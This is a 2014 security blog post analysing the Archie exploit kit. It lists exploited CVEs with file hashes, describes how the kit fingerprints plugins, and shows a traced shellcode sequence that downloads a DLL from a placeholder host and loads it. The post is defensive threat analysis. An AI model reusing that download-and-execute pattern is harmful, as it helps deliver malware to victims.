
Archie: Just another Exploit kit

September 15, 2014  |  Jaime Blasco

We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems.

The number of Exploit Kits available has experienced exponential growth in the last few years. Since Blackhole’s author was arrested in 2013, the number of Exploit Kits has increased - including Neutrino, Magnitude, Nuclear, Rig and Angler. In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf.

Archie is a really basic Exploit Kit that uses different exploit modules copied from the Metasploit Framework. When the victim lands on the main page, Archie uses the PluginDetect Javascript library to extract information about Flash, Silverlight and Acrobat Reader versions and the information is sent to the server.

It also uses the following trick to check whether or not the system is running a 64-bit version of Internet Explorer. We documented this trick in previous blog posts.

Depending on the Silverlight, Internet Explorer and Flash versions, it will try to load a different exploit module including:

Filename CVE Affected Software MD5
flashlow.swf CVE-2014-0497 Flash 4f3f7b896ab69ec2c082709220000b38
flashhigh.swf CVE-2014-0515 Flash 18e0629ba830f0894268aa1dca92ea78
silverapp1.xap CVE-2013-0074 SilverLight f1759371fe6c7f46ca3c82edd456eca2
iebasic.html CVE-2013-2551 Internet Explorer e9fbd007f6fa2f188c090f535da7ca4a

Archie contains shellcode in different formats that is sent to the different exploit modules generated by Metasploit when it loads them.

If we disassemble the shellcode we can see it is a basic download and execute payload.

4010bb     LoadLibraryA(urlmon)
401089     VirtualAlloc(base=0 , sz=400) = 60000
4010ce     GetTempPath(len=104, buf=60000) = 14
4010a7     URLDownloadToFile(http://IPADDRESS:PORT/dd, C:usersuserTempe.dll)
401108     LoadLibraryA(C:usersuserTempe.dll)
401114     Sleep(0x3a98)

The shellcode downloads a DLL from the webserver, writes it in Users[Current_user]Tempe.dll and then loads it.

The IP address where the Archie Exploit Kit is hosted, and the piece of malware delivered, is also being used for click fraud operations. It is related to this research published by Kimberly on the click fraud bot http://stopmalvertising.com/malware-reports/anatomy-of-a-net-click-fraud-bot.html [no longer available].

Following is the list of hashes that we have found connecting to the same C&C:


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